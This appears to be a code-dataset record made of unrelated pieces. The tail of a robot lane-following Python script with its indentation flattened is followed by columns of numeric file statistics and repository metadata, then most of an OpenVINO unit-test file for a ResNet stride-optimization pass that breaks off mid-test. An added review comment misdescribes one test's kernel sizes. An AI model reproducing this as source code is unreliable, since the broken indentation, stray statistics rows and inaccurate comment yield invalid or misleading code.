# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), 1]
else:
return [self.stop_speed(0.44), 0]
if neg_slope_avg is not None:
if neg_slope_avg > -0.6:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), steerer]
else:
return [self.stop_speed(0.44), steerer]
return [self.stop_speed(0.44), steerer]
if __name__ == '__main__':
    # Script entry point: parse an optional --filename argument.
    parser = argparse.ArgumentParser()
    parser.add_argument('--filename', default=None)
    arg = parser.parse_args()  # NOTE(review): use of `arg` is not visible in this chunk — presumably consumed below
| 39.232776
| 107
| 0.471979
| 7,944
| 58,653
| 3.303877
| 0.037261
| 0.017831
| 0.016345
| 0.070411
| 0.959308
| 0.951535
| 0.946735
| 0.944182
| 0.940715
| 0.936333
| 0
| 0.076049
| 0.431231
| 58,653
| 1,494
| 108
| 39.259036
| 0.710701
| 0.244267
| 0
| 0.905128
| 0
| 0
| 0.005608
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010256
| false
| 0.021795
| 0.00641
| 0
| 0.255128
| 0.028205
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db51878bb985db494b8c2f165ef4475626cd37d4
| 35,779
|
py
|
Python
|
model-optimizer/mo/middle/passes/fusing/resnet_optimization_test.py
|
JOCh1958/openvino
|
070201feeec5550b7cf8ec5a0ffd72dc879750be
|
[
"Apache-2.0"
] | 1
|
2021-04-06T03:32:12.000Z
|
2021-04-06T03:32:12.000Z
|
model-optimizer/mo/middle/passes/fusing/resnet_optimization_test.py
|
JOCh1958/openvino
|
070201feeec5550b7cf8ec5a0ffd72dc879750be
|
[
"Apache-2.0"
] | 28
|
2021-09-24T09:29:02.000Z
|
2022-03-28T13:20:46.000Z
|
model-optimizer/mo/middle/passes/fusing/resnet_optimization_test.py
|
JOCh1958/openvino
|
070201feeec5550b7cf8ec5a0ffd72dc879750be
|
[
"Apache-2.0"
] | 1
|
2020-08-30T11:48:03.000Z
|
2020-08-30T11:48:03.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from mo.front.common.partial_infer.elemental import copy_shape_infer
from mo.front.common.partial_infer.eltwise import eltwise_infer
from mo.middle.passes.fusing.resnet_optimization import stride_optimization
from mo.ops.convolution import Convolution
from mo.ops.pooling import Pooling
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph
def max_elt_lambda(node):
    """Shape-infer function for eltwise Maximum nodes (element-wise np.maximum).

    PEP 8 (E731): a named function is preferred over a lambda bound to a name;
    the name and call signature are unchanged for existing users.
    """
    return eltwise_infer(node, lambda a, b: np.maximum(a, b))
# Node-attribute templates shared by all ResnetOptimizationTests graphs.
# Per-test shapes/strides/kernels are supplied via build_graph overrides.
nodes_attributes = {
    # Placeholders
    'placeholder_1': {'shape': None, 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
    'placeholder_1_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
    # Eltwise (element-wise Maximum) operation
    'eltwise_1': {'type': 'Maximum', 'kind': 'op', 'op': 'Maximum', 'infer': max_elt_lambda},
    'eltwise_1_data': {'name': 'eltwise_1_data', 'value': None, 'shape': None, 'kind': 'data'},
    # Convolutions: conv_1..conv_5 are structurally identical NCHW Conv2D ops,
    # each with weight (_w), bias (_b) and output (_data) data nodes.
    'conv_1': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
               'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
               'spatial_dims': np.array([2, 3]),
               'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
               'dilation': np.array([1, 1, 1, 1]),
               'batch_dims': np.array([0]), 'infer': Convolution.infer,
               'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
               'output_feature_channel': 0, },
    'conv_1_w': {'value': None, 'shape': None, 'kind': 'data',
                 'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
    'conv_1_b': {'value': None, 'shape': None, 'kind': 'data'},
    'conv_1_data': {'value': None, 'shape': None, 'kind': 'data'},
    'conv_2': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
               'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
               'spatial_dims': np.array([2, 3]),
               'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
               'dilation': np.array([1, 1, 1, 1]),
               'batch_dims': np.array([0]), 'infer': Convolution.infer,
               'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
               'output_feature_channel': 0, },
    'conv_2_w': {'value': None, 'shape': None, 'kind': 'data',
                 'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
    'conv_2_b': {'value': None, 'shape': None, 'kind': 'data'},
    'conv_2_data': {'value': None, 'shape': None, 'kind': 'data'},
    'conv_3': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
               'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
               'spatial_dims': np.array([2, 3]),
               'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
               'dilation': np.array([1, 1, 1, 1]),
               'batch_dims': np.array([0]), 'infer': Convolution.infer,
               'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
               'output_feature_channel': 0, },
    'conv_3_w': {'value': None, 'shape': None, 'kind': 'data',
                 'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
    'conv_3_b': {'value': None, 'shape': None, 'kind': 'data'},
    'conv_3_data': {'value': None, 'shape': None, 'kind': 'data'},
    'conv_4': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
               'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
               'spatial_dims': np.array([2, 3]),
               'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
               'dilation': np.array([1, 1, 1, 1]),
               'batch_dims': np.array([0]), 'infer': Convolution.infer,
               'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
               'output_feature_channel': 0, },
    'conv_4_w': {'value': None, 'shape': None, 'kind': 'data',
                 'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
    'conv_4_b': {'value': None, 'shape': None, 'kind': 'data'},
    'conv_4_data': {'value': None, 'shape': None, 'kind': 'data'},
    'conv_5': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
               'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
               'spatial_dims': np.array([2, 3]),
               'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
               'dilation': np.array([1, 1, 1, 1]),
               'batch_dims': np.array([0]), 'infer': Convolution.infer,
               'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
               'output_feature_channel': 0, },
    'conv_5_w': {'value': None, 'shape': None, 'kind': 'data',
                 'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
    'conv_5_b': {'value': None, 'shape': None, 'kind': 'data'},
    'conv_5_data': {'value': None, 'shape': None, 'kind': 'data'},
    # ReLU
    'relu_1': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
    'relu_1_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
    'relu_2': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
    'relu_2_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
    'relu_3': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
    'relu_3_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
    # Pooling
    'pool_1': {'type': 'Pooling', 'kind': 'op', 'op': 'Pooling',
               'spatial_dims': np.array([2, 3]),
               'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
               'infer': Pooling.infer},
    'pool_1_data': {'value': None, 'shape': None, 'kind': 'data'},
}
# In description of unit tests below will be used next syntax: Operation(NxM,XxY), where NxM - kernel size, XxY - stride
class ResnetOptimizationTests(unittest.TestCase):
# Pl->Conv(1x1,1x1)->Conv(1x1,2x2) => Pl->Conv(1x1,2x2)->Conv(1x1,1x1)
    def test_resnet_optimization_1(self):
        """Conv(1x1, stride 1x1) -> Conv(1x1, stride 2x2) must be rewritten to
        Conv(1x1, stride 2x2) -> Conv(1x1, stride 1x1), i.e. the stride moves
        to the first convolution while the final output shape is unchanged."""
        graph = build_graph(nodes_attributes,
                            [('placeholder_1', 'placeholder_1_data'),
                             ('placeholder_1_data', 'conv_1'),
                             ('conv_1_w', 'conv_1'),
                             ('conv_1_b', 'conv_1'),
                             ('conv_1', 'conv_1_data'),
                             ('conv_1_data', 'conv_2'),
                             ('conv_2_w', 'conv_2'),
                             ('conv_2_b', 'conv_2'),
                             ('conv_2', 'conv_2_data'),
                             ],
                            {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                             'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                             'conv_1': {'kernel_spatial': np.array([1, 1]),
                                        'stride': np.array([1, 1, 1, 1]),
                                        'output': np.array([3]), },
                             'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
                             'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                             'conv_2': {'kernel_spatial': np.array([1, 1]),
                                        'stride': np.array([1, 1, 2, 2]),
                                        'output': np.array([3]), },
                             'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
                             },
                            nodes_with_edges_only=True)
        # Expected graph after stride_optimization: strides swapped between convs.
        graph_ref = build_graph(nodes_attributes,
                                [('placeholder_1', 'placeholder_1_data'),
                                 ('placeholder_1_data', 'conv_1'),
                                 ('conv_1_w', 'conv_1'),
                                 ('conv_1_b', 'conv_1'),
                                 ('conv_1', 'conv_1_data'),
                                 ('conv_1_data', 'conv_2'),
                                 ('conv_2_w', 'conv_2'),
                                 ('conv_2_b', 'conv_2'),
                                 ('conv_2', 'conv_2_data'),
                                 ],
                                {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                                 'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                                 'conv_1': {'kernel_spatial': np.array([1, 1]),
                                            'stride': np.array([1, 1, 2, 2]),
                                            'output': np.array([3]), },
                                 'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
                                 'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                                 'conv_2': {'kernel_spatial': np.array([1, 1]),
                                            'stride': np.array([1, 1, 1, 1]),
                                            'output': np.array([3]), },
                                 'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
                                 },
                                nodes_with_edges_only=True)
        graph.graph['layout'] = 'NCHW'
        graph_ref.graph['layout'] = 'NCHW'
        stride_optimization(graph)
        # Compare everything reachable from conv_2_data, including op attrs.
        (flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
        self.assertTrue(flag, resp)
    # Pl->Conv(1x1,2x2)->Conv(1x1,2x2) => Pl->Conv(1x1,4x4)->Conv(1x1,1x1)
    def test_resnet_optimization_2(self):
        """Conv(1x1, stride 2x2) -> Conv(1x1, stride 2x2) must fuse into
        Conv(1x1, stride 4x4) -> Conv(1x1, stride 1x1).

        NOTE(review): the comment above this test mentions 3x3 kernels, but
        both convolutions here use kernel_spatial [1, 1]."""
        graph = build_graph(nodes_attributes,
                            [('placeholder_1', 'placeholder_1_data'),
                             ('placeholder_1_data', 'conv_1'),
                             ('conv_1_w', 'conv_1'),
                             ('conv_1_b', 'conv_1'),
                             ('conv_1', 'conv_1_data'),
                             ('conv_1_data', 'conv_2'),
                             ('conv_2_w', 'conv_2'),
                             ('conv_2_b', 'conv_2'),
                             ('conv_2', 'conv_2_data'),
                             ],
                            {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                             'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                             'conv_1': {'kernel_spatial': np.array([1, 1]),
                                        'stride': np.array([1, 1, 2, 2]),
                                        'output': np.array([3]), },
                             'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
                             'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                             'conv_2': {'kernel_spatial': np.array([1, 1]),
                                        'stride': np.array([1, 1, 2, 2]),
                                        'output': np.array([3]), },
                             'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
                             },
                            nodes_with_edges_only=True)
        # Expected graph: both strides concentrated on conv_1 (4x4).
        graph_ref = build_graph(nodes_attributes,
                                [('placeholder_1', 'placeholder_1_data'),
                                 ('placeholder_1_data', 'conv_1'),
                                 ('conv_1_w', 'conv_1'),
                                 ('conv_1_b', 'conv_1'),
                                 ('conv_1', 'conv_1_data'),
                                 ('conv_1_data', 'conv_2'),
                                 ('conv_2_w', 'conv_2'),
                                 ('conv_2_b', 'conv_2'),
                                 ('conv_2', 'conv_2_data'),
                                 ],
                                {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                                 'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                                 'conv_1': {'kernel_spatial': np.array([1, 1]),
                                            'stride': np.array([1, 1, 4, 4]),
                                            'output': np.array([3]), },
                                 'conv_1_data': {'shape': np.array([1, 3, 56, 56])},
                                 'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                                 'conv_2': {'kernel_spatial': np.array([1, 1]),
                                            'stride': np.array([1, 1, 1, 1]),
                                            'output': np.array([3]), },
                                 'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
                                 },
                                nodes_with_edges_only=True)
        graph.graph['layout'] = 'NCHW'
        graph_ref.graph['layout'] = 'NCHW'
        stride_optimization(graph)
        # Compare everything reachable from conv_2_data, including op attrs.
        (flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
        self.assertTrue(flag, resp)
# Pl->Conv(3x3,2x2)->Conv(3x3,2x2) => Same
    def test_resnet_optimization_3(self):
        """Conv(3x3, stride 2x2) -> Conv(3x3, stride 2x2) must be left
        unchanged: the pass does not move strides across 3x3 kernels here
        (reference graph is identical to the input graph)."""
        graph = build_graph(nodes_attributes,
                            [('placeholder_1', 'placeholder_1_data'),
                             ('placeholder_1_data', 'conv_1'),
                             ('conv_1_w', 'conv_1'),
                             ('conv_1_b', 'conv_1'),
                             ('conv_1', 'conv_1_data'),
                             ('conv_1_data', 'conv_2'),
                             ('conv_2_w', 'conv_2'),
                             ('conv_2_b', 'conv_2'),
                             ('conv_2', 'conv_2_data'),
                             ],
                            {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                             'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
                             'conv_1': {'kernel_spatial': np.array([3, 3]),
                                        'stride': np.array([1, 1, 2, 2]),
                                        'output': np.array([3]), },
                             'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
                             'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
                             'conv_2': {'kernel_spatial': np.array([3, 3]),
                                        'stride': np.array([1, 1, 2, 2]),
                                        'output': np.array([3]), },
                             'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
                             },
                            nodes_with_edges_only=True)
        # Expected graph: identical to the input — no optimization applies.
        graph_ref = build_graph(nodes_attributes,
                                [('placeholder_1', 'placeholder_1_data'),
                                 ('placeholder_1_data', 'conv_1'),
                                 ('conv_1_w', 'conv_1'),
                                 ('conv_1_b', 'conv_1'),
                                 ('conv_1', 'conv_1_data'),
                                 ('conv_1_data', 'conv_2'),
                                 ('conv_2_w', 'conv_2'),
                                 ('conv_2_b', 'conv_2'),
                                 ('conv_2', 'conv_2_data'),
                                 ],
                                {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                                 'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
                                 'conv_1': {'kernel_spatial': np.array([3, 3]),
                                            'stride': np.array([1, 1, 2, 2]),
                                            'output': np.array([3]), },
                                 'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
                                 'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
                                 'conv_2': {'kernel_spatial': np.array([3, 3]),
                                            'stride': np.array([1, 1, 2, 2]),
                                            'output': np.array([3]), },
                                 'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
                                 },
                                nodes_with_edges_only=True)
        graph.graph['layout'] = 'NCHW'
        graph_ref.graph['layout'] = 'NCHW'
        stride_optimization(graph)
        # Compare everything reachable from conv_2_data, including op attrs.
        (flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
        self.assertTrue(flag, resp)
    # Pl--->Conv(3x3,2x2)->ReLU--->Eltwise-->Conv(1x1,2x2) => Pl--->Conv(3x3,4x4)->ReLU--->Eltwise-->Conv(1x1,1x1)
    #   `-->Conv(3x3,2x2)->ReLU---`                             `-->Conv(3x3,4x4)->ReLU---`
    def test_resnet_optimization_4(self):
        """Stride optimization across a two-branch residual block.

        Both branches end in a ReLU and merge in an Eltwise; the expectation
        (encoded in graph_ref) is that the stride-2 1x1 conv after the merge
        becomes stride-1 and its stride is pushed up into the stride-2 convs
        on both branches (2x2 -> 4x4), shrinking the intermediate shapes from
        112x112 to 56x56.
        """
        # Original graph: two parallel Conv(3x3, stride 2x2)->ReLU branches
        # merged by eltwise_1, followed by Conv(1x1, stride 2x2).
        graph = build_graph(nodes_attributes,
                            [('placeholder_1', 'placeholder_1_data'),
                             ('placeholder_1_data', 'conv_1'),
                             ('conv_1_w', 'conv_1'),
                             ('conv_1_b', 'conv_1'),
                             ('conv_1', 'conv_1_data'),
                             ('conv_1_data', 'relu_1'),
                             ('relu_1', 'relu_1_data'),
                             ('placeholder_1_data', 'conv_2'),
                             ('conv_2_w', 'conv_2'),
                             ('conv_2_b', 'conv_2'),
                             ('conv_2', 'conv_2_data'),
                             ('conv_2_data', 'relu_2'),
                             ('relu_2', 'relu_2_data'),
                             ('relu_1_data', 'eltwise_1'),
                             ('relu_2_data', 'eltwise_1'),
                             ('eltwise_1', 'eltwise_1_data'),
                             ('eltwise_1_data', 'conv_3'),
                             ('conv_3_w', 'conv_3'),
                             ('conv_3_b', 'conv_3'),
                             ('conv_3', 'conv_3_data'),
                             ],
                            {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                             'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
                             'conv_1': {'kernel_spatial': np.array([3, 3]),
                                        'stride': np.array([1, 1, 2, 2]),
                                        'output': np.array([3]), },
                             'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
                             'relu_1_data': {'shape': np.array([1, 3, 112, 112])},
                             'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
                             'conv_2': {'kernel_spatial': np.array([3, 3]),
                                        'stride': np.array([1, 1, 2, 2]),
                                        'output': np.array([3]), },
                             'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
                             'relu_2_data': {'shape': np.array([1, 3, 112, 112])},
                             'eltwise_1_data': {'shape': np.array([1, 3, 112, 112])},
                             'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                             'conv_3': {'kernel_spatial': np.array([1, 1]),
                                        'stride': np.array([1, 1, 2, 2]),
                                        'output': np.array([3]), },
                             'conv_3_data': {'shape': np.array([1, 3, 56, 56])},
                             },
                            nodes_with_edges_only=True)
        # Expected graph after optimization: branch convs take stride 4x4,
        # the conv after the eltwise becomes stride 1x1.
        graph_ref = build_graph(nodes_attributes,
                                [('placeholder_1', 'placeholder_1_data'),
                                 ('placeholder_1_data', 'conv_1'),
                                 ('conv_1_w', 'conv_1'),
                                 ('conv_1_b', 'conv_1'),
                                 ('conv_1', 'conv_1_data'),
                                 ('conv_1_data', 'relu_1'),
                                 ('relu_1', 'relu_1_data'),
                                 ('placeholder_1_data', 'conv_2'),
                                 ('conv_2_w', 'conv_2'),
                                 ('conv_2_b', 'conv_2'),
                                 ('conv_2', 'conv_2_data'),
                                 ('conv_2_data', 'relu_2'),
                                 ('relu_2', 'relu_2_data'),
                                 ('relu_1_data', 'eltwise_1'),
                                 ('relu_2_data', 'eltwise_1'),
                                 ('eltwise_1', 'eltwise_1_data'),
                                 ('eltwise_1_data', 'conv_3'),
                                 ('conv_3_w', 'conv_3'),
                                 ('conv_3_b', 'conv_3'),
                                 ('conv_3', 'conv_3_data'),
                                 ],
                                {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                                 'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
                                 'conv_1': {'kernel_spatial': np.array([3, 3]),
                                            'stride': np.array([1, 1, 4, 4]),
                                            'output': np.array([3])},
                                 'conv_1_data': {'shape': np.array([1, 3, 56, 56])},
                                 'relu_1_data': {'shape': np.array([1, 3, 56, 56])},
                                 'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
                                 'conv_2': {'kernel_spatial': np.array([3, 3]),
                                            'stride': np.array([1, 1, 4, 4]),
                                            'output': np.array([3])},
                                 'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
                                 'relu_2_data': {'shape': np.array([1, 3, 56, 56])},
                                 'eltwise_1_data': {'shape': np.array([1, 3, 56, 56])},
                                 'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                                 'conv_3': {'kernel_spatial': np.array([1, 1]),
                                            'stride': np.array([1, 1, 1, 1]),
                                            'output': np.array([3])},
                                 'conv_3_data': {'shape': np.array([1, 3, 56, 56])},
                                 },
                                nodes_with_edges_only=True)
        graph.graph['layout'] = 'NCHW'
        graph_ref.graph['layout'] = 'NCHW'
        # dump_graph_for_graphviz(graph)
        # dump_graph_for_graphviz(graph_ref)
        stride_optimization(graph)
        # Compare the transformed graph to the reference up to conv_3_data,
        # including op attributes (strides, kernels, shapes).
        (flag, resp) = compare_graphs(graph, graph_ref, 'conv_3_data', check_op_attrs=True)
        self.assertTrue(flag, resp)
    # Pl--->Conv(1x1,1x1)->ReLU--->Eltwise-->Conv(1x1,2x2) => Pl--->Conv(1x1,2x2)->ReLU--->Eltwise-->Conv(1x1,1x1)
    #   `----------------->ReLU---`                             `-->Pool(1x1,2x2)->ReLU---`
    def test_resnet_optimization_5(self):
        """Stride optimization when one residual branch has no convolution.

        The stride from the conv after the Eltwise is pushed up: the conv
        branch absorbs it (1x1 stride becomes 2x2), while a stride-2 pooling
        node is expected to be inserted into the conv-free branch so both
        Eltwise inputs keep matching 112x112 shapes.
        """
        # Original graph: conv branch and a bare ReLU branch merged by
        # eltwise_1, followed by Conv(1x1, stride 2x2).
        graph = build_graph(nodes_attributes,
                            [('placeholder_1', 'placeholder_1_data'),
                             ('placeholder_1_data', 'conv_1'),
                             ('conv_1_w', 'conv_1'),
                             ('conv_1_b', 'conv_1'),
                             ('conv_1', 'conv_1_data'),
                             ('conv_1_data', 'relu_1'),
                             ('relu_1', 'relu_1_data'),
                             ('placeholder_1_data', 'relu_2'),
                             ('relu_2', 'relu_2_data'),
                             ('relu_1_data', 'eltwise_1'),
                             ('relu_2_data', 'eltwise_1'),
                             ('eltwise_1', 'eltwise_1_data'),
                             ('eltwise_1_data', 'conv_3'),
                             ('conv_3_w', 'conv_3'),
                             ('conv_3_b', 'conv_3'),
                             ('conv_3', 'conv_3_data'),
                             ],
                            {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                             'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                             'conv_1': {'kernel_spatial': np.array([1, 1]),
                                        'stride': np.array([1, 1, 1, 1]),
                                        'output': np.array([3]), },
                             'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
                             'relu_1_data': {'shape': np.array([1, 3, 224, 224])},
                             'relu_2_data': {'shape': np.array([1, 3, 224, 224])},
                             'eltwise_1_data': {'shape': np.array([1, 3, 224, 224])},
                             'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                             'conv_3': {'kernel_spatial': np.array([1, 1]),
                                        'stride': np.array([1, 1, 2, 2]),
                                        'output': np.array([3]), },
                             'conv_3_data': {'shape': np.array([1, 3, 112, 112])},
                             },
                            nodes_with_edges_only=True)
        # Expected graph: conv_1 takes stride 2x2, pool_1 (stride 2x2) is
        # inserted on the conv-free branch, conv_3 becomes stride 1x1.
        graph_ref = build_graph(nodes_attributes,
                                [('placeholder_1', 'placeholder_1_data'),
                                 ('placeholder_1_data', 'conv_1'),
                                 ('conv_1_w', 'conv_1'),
                                 ('conv_1_b', 'conv_1'),
                                 ('conv_1', 'conv_1_data'),
                                 ('conv_1_data', 'relu_1'),
                                 ('relu_1', 'relu_1_data'),
                                 ('placeholder_1_data', 'pool_1'),
                                 ('pool_1', 'pool_1_data'),
                                 ('pool_1_data', 'relu_2'),
                                 ('relu_2', 'relu_2_data'),
                                 ('relu_1_data', 'eltwise_1'),
                                 ('relu_2_data', 'eltwise_1'),
                                 ('eltwise_1', 'eltwise_1_data'),
                                 ('eltwise_1_data', 'conv_3'),
                                 ('conv_3_w', 'conv_3'),
                                 ('conv_3_b', 'conv_3'),
                                 ('conv_3', 'conv_3_data'),
                                 ],
                                {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                                 'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                                 'conv_1': {'kernel_spatial': np.array([1, 1]),
                                            'stride': np.array([1, 1, 2, 2]),
                                            'output': np.array([3])},
                                 'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
                                 'relu_1_data': {'shape': np.array([1, 3, 112, 112])},
                                 'pool_1': {'stride': np.array([1, 1, 2, 2])},
                                 'pool_1_data': {'shape': np.array([1, 3, 112, 112])},
                                 'relu_2_data': {'shape': np.array([1, 3, 112, 112])},
                                 'eltwise_1_data': {'shape': np.array([1, 3, 112, 112])},
                                 'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                                 'conv_3': {'kernel_spatial': np.array([1, 1]),
                                            'stride': np.array([1, 1, 1, 1]),
                                            'output': np.array([3])},
                                 'conv_3_data': {'shape': np.array([1, 3, 112, 112])},
                                 },
                                nodes_with_edges_only=True)
        graph.graph['layout'] = 'NCHW'
        graph_ref.graph['layout'] = 'NCHW'
        # dump_graph_for_graphviz(graph)
        # dump_graph_for_graphviz(graph_ref)
        stride_optimization(graph)
        # Compare the transformed graph to the reference up to conv_3_data,
        # including op attributes (strides, kernels, shapes).
        (flag, resp) = compare_graphs(graph, graph_ref, 'conv_3_data', check_op_attrs=True)
        self.assertTrue(flag, resp)
    # Pl->Conv(1x1,1x1)->Conv(1x1,2x2)->Conv(3x3,1x1)->Conv(1x1,2x2)
    # =>
    # Pl->Conv(1x1,2x2)->Conv(1x1,1x1)->Conv(3x3,2x2)->Conv(1x1,1x1)
    def test_resnet_optimization_6(self):
        """Stride optimization along a linear chain of four convolutions.

        Each stride-2 1x1 conv hands its stride to the nearest upstream
        stride-1 conv: conv_2's stride moves to conv_1 and conv_4's stride
        moves to conv_3, so downsampling happens as early as possible while
        the final output shape (1x3x55x55) is preserved.
        """
        # Original chain: 1x1/s1 -> 1x1/s2 -> 3x3/s1 -> 1x1/s2.
        graph = build_graph(nodes_attributes,
                            [('placeholder_1', 'placeholder_1_data'),
                             ('placeholder_1_data', 'conv_1'),
                             ('conv_1_w', 'conv_1'),
                             ('conv_1_b', 'conv_1'),
                             ('conv_1', 'conv_1_data'),
                             ('conv_1_data', 'conv_2'),
                             ('conv_2_w', 'conv_2'),
                             ('conv_2_b', 'conv_2'),
                             ('conv_2', 'conv_2_data'),
                             ('conv_2_data', 'conv_3'),
                             ('conv_3_w', 'conv_3'),
                             ('conv_3_b', 'conv_3'),
                             ('conv_3', 'conv_3_data'),
                             ('conv_3_data', 'conv_4'),
                             ('conv_4_w', 'conv_4'),
                             ('conv_4_b', 'conv_4'),
                             ('conv_4', 'conv_4_data'),
                             ],
                            {'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
                             'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
                             'conv_1': {'kernel_spatial': np.array([1, 1]),
                                        'stride': np.array([1, 1, 1, 1]),
                                        'output': np.array([3]), },
                             'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
